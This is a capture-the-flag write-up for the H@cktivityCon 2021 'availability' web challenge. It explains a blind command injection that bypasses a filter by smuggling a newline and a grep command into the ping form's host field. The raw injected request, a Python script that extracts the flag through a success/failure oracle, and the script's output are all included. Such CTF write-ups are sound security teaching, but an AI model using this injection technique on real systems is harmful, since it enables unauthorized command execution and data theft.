/ctfs/h@cktivitycon - 2021/web/availability (n°3 command injection)


Once again, it is pretty much the same challenge. We can again bypass WAF with carriage return.
The only problem for this one is that we are not able to see the result

POST / HTTP/1.1
Host: challenge.ctf.games:31731
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge.ctf.games:31731
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge.ctf.games:31731/
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

host=82.65.167.141 %0A grep 0 flag.txt

Hopefully, there are cannaries values in the response. With the grep command we can deduce if a pattern is or is not in the flag. Plus we know the flag format: flag{< md5 hash >}

Reponse:
Success! Looks like pinging the host &#39;82.65.167.141 
 grep 0 flag.txt&#39; worked!
When it's found

Failure! The host &#39;82.65.167.141 
 grep 3 flag.txt&#39; was not able to be pinged.
When the pattern is not in the flag

Scripting time !

I wrote a small script to retrieve the whole flag
#! /usr/bin/env python3
#-- all rights: @fey --#
#-- py-version: 3.*  --#


import requests as rq


dic = ["a","b", "c","d","f","1","2","4","5","6","7", "8", "9", "0"]

patterns = []
host = "challenge.ctf.games:31731"


def send_req(pat):
    data={"host":"82.65.167.141 %s grep %s flag.txt" % ("\n",pat)}
    resp = rq.post(url="http://"+host,data=data)
    return "worked!" in resp.text


def rec(pattern):
    for i in dic:
        if send_req(pattern + i):
          patterns.append(pattern + i)
          print("found:", pattern + i)
          rec(pattern + i)



if __name__ == "__main__":
    rec("")
    print(patterns)

./exp.py  
found: a
found: a0
found: a08
found: a088
[...]
found: a08816027174c1
found: a08816027174c14
[...]

found: c11d098dd25a08816027174c14f7bf6
found: c11d098dd25a08816027174c14f7bf60

So here is the flag: flag{c11d098dd25a08816027174c14f7bf60}